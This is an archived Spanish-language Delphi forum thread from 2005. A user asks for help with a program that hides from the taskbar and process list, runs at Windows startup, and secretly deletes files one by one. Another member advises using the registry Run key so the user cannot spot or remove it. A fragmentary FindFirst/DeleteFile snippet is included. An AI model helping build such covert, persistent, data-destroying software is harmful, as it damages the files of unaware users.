PDA

Ver la Versión Completa : Necesito ayuda en programación


Casper1
12-01-2005, 20:41:10
Hola amigos del foro.

Estoy haciendo una aplicación para que me borre archivos sin que se de cuenta nadie poco a poco. Mi intención es que el programa se ejecute como fantasma, que no se visualice, no se vea enla barra de tareas y tampoco enla lista de CTR+ALT+SUP; busque archivos con una extención determinada en una ubicación dada y borre un archivo.

La mayor parte del programa ya la tengo hecha. La aplicación no sale en barra de tareas, no sale enla lista de programas ejecutándose, busca los archivos que yo quiero en el lugar que le digo e incluso puedo borrar archivos y directorios, pero todos d euna sola vez, no uno por uno que es lo que yo quiero y cada vez que se ejecute el programa.

El programa lo meto en inicio para que cada vez que se inicie Windows se ejecute el programa y busque los archivos y de los que encuentre borre uno.

El programa está sencillo, pero no doy con la parte esa de borrar solo uno de la lista que se obtenga de los archivos que tengan la extensión.

Ah!, uso Delphi 7 y mi S.O es WinMe y WinXP.

Coco
12-01-2005, 20:51:13
no parece dificil lo que necesitas pero deberias explicarte un poco mas sobre que metodos utilizas para obtener la lista de archivos a borrar!

tienes una lista en un ini o quieres buscar los archivos directamente sobre el disco?

Salu2

Casper1
12-01-2005, 22:01:47
Bueno, yo utilizo para buscar los archivos FindFirst y el nombre del archivo o la extensión en la ubicación que quiero.

¿Qué hago mal? luego voy a bajar el código para que lo lean y me digan qué parte está mal porque en esta PC que estoy ahora no tengo nada de mis cosas de trabajo.

marcoszorrilla
12-01-2005, 22:06:47
Quizás buscas:

DeleteFile(FileName);


Un Saludo.

Lepe
13-01-2005, 12:56:22
Hola Casper1.

Espero aceptes este comentario de buen grado.

Ya que has trabajado tanto para que no se vea en la barra de tareas ni en los procesos, yo incluiria el programa en el registro de windows en lugar de en el menú inicio de windows por 2 razones:

- Si al iniciar windows el usuario mantiene presionada la tecla SHIFT, los programas del Menu Inicio --> Programas -> Inicio no se ejecutan.

- Si el usuario cotillea el menú inicio, puede ver que ese programa se está ejecutando y puede quitarlo del menú inicio.

Si no me equivoco la clave de registro es: LOCAL MACHINE\Microsoft\currentversion\run

Si te gusta la idea, busca en el foro por Tregistry para saber como añadir al registro tu programa.

Saludos

Casper1
13-01-2005, 14:17:28
Gracias Lepe, había pensado en eso pero por el momento que estoy en la implementación lo tengo en inicio.

Este es mi código (o parte de él)

procedure TForm1.Button2Click(Sender: TObject);
var
DirInfo: TSearchRec;
r : Integer;
begin
r := FindFirst('C:\Archivos a borrar\*.*', FaAnyfile, DirInfo); /para buscar el archivo

......

if r= 0 then DeleteFile(pChar('C:\Archivos a borrar\*.avi')) / borro los archivos avi

.....

end;
end.

no es el código completo porque le he hecho varias versiones, pero estas son las principales líneas que hacen parte de lo que quiero, pero en la línea de borrar el archivo los borra todos, lo que quiero es que en lugar de borrar todos los que tienen esa extensión sean borrados uno a uno cuando se inicie Windows.